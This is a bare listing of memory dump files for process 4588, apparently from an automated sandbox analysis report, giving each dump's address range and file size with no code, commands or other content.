memory/4588-52-0x0000000077981000-0x0000000077AA1000-memory.dmpFilesize
1.1MB
-
memory/4588-41-0x0000000007EC0000-0x0000000008464000-memory.dmpFilesize
5.6MB
-
memory/4588-40-0x0000000006160000-0x0000000006182000-memory.dmpFilesize
136KB
-
memory/4588-39-0x0000000006CB0000-0x0000000006D46000-memory.dmpFilesize
600KB
-
memory/4588-43-0x00000000047E0000-0x00000000047F0000-memory.dmpFilesize
64KB
-
memory/4588-70-0x0000000074F60000-0x0000000075710000-memory.dmpFilesize
7.7MB
-
memory/4588-37-0x0000000007290000-0x000000000790A000-memory.dmpFilesize
6.5MB
-
memory/4588-35-0x0000000005C60000-0x0000000005CAC000-memory.dmpFilesize
304KB
-
memory/4588-73-0x0000000008470000-0x000000000AD25000-memory.dmpFilesize
40.7MB
-
memory/4588-34-0x0000000004910000-0x000000000492E000-memory.dmpFilesize
120KB
-
memory/4588-33-0x0000000005730000-0x0000000005A84000-memory.dmpFilesize
3.3MB
-
memory/4588-21-0x0000000004D40000-0x0000000004DA6000-memory.dmpFilesize
408KB
-
memory/4588-20-0x0000000004CA0000-0x0000000004CC2000-memory.dmpFilesize
136KB
-
memory/4588-19-0x0000000004E20000-0x0000000005448000-memory.dmpFilesize
6.2MB
-
memory/4588-18-0x00000000047E0000-0x00000000047F0000-memory.dmpFilesize
64KB
-
memory/4588-17-0x0000000002230000-0x0000000002266000-memory.dmpFilesize
216KB
-
memory/4588-16-0x0000000074F60000-0x0000000075710000-memory.dmpFilesize
7.7MB